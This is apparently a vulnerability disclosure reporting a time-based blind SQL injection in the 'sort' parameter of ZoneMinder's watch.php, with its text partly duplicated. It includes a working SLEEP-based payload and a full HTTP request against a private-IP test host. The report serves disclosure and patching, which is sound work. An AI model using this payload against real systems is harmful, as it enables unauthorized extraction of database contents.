Hello i have found a sql injection.
SQL injection is a type of cybersecurity vulnerability that occurs when malicious actors exploit inadequate input validation in web applications to manipulate the underlying database.
GET /zm/index.php?sort=Id+AND+(SELECT+3388+FROM+(SELECT(SLEEP(8-(IF(2359>2358,0,5)))))Ingf)&order=desc&limit=20&view=request&request=watch&mid=1 HTTP/1.1
Host: 192.168.64.124
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://192.168.64.124/zm/?view=watch&mid=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: zmSkin=classic; zmCSS=dark; _ga=GA1.1.558338520.1691501412; _ga_BN3VSG0XY4=GS1.1.1691564836.3.0.1691564836.0.0.0; zmMontageLayout=3; zmMontageScale=; zmBandwidth=high; ZMSESSID=pohkipr4k3q7qfoj6vv5dj2fi8
Connection: close
An attacker can use this to extract the information in database.
If the steps are unclear or having issue to reproduce the exploit let me know.
-best regards 10xdev
Summary
Hello i have found a sql injection.
SQL injection is a type of cybersecurity vulnerability that occurs when malicious actors exploit inadequate input validation in web applications to manipulate the underlying database.
Details
In WWW/AJAX/watch.php Line: 51 takes a few parameter ( i have tested
$sortparameter )in sql query without sanitizing it which makes it vulnerable to sql injection.PoC
this is the payload that triage a sleep in the database:
sort=Id+AND+(SELECT+3388+FROM+(SELECT(SLEEP(8-(IF(2359>2358,0,5)))))Ingf)and this is the whole request:
and you can see the poc screenshots in here : https://wormhole.app/lJR8k#iB3jhbqp_wx93l0bRVC0dg
Impact
An attacker can use this to extract the information in database.
NOTE:
If the steps are unclear or having issue to reproduce the exploit let me know.
-best regards 10xdev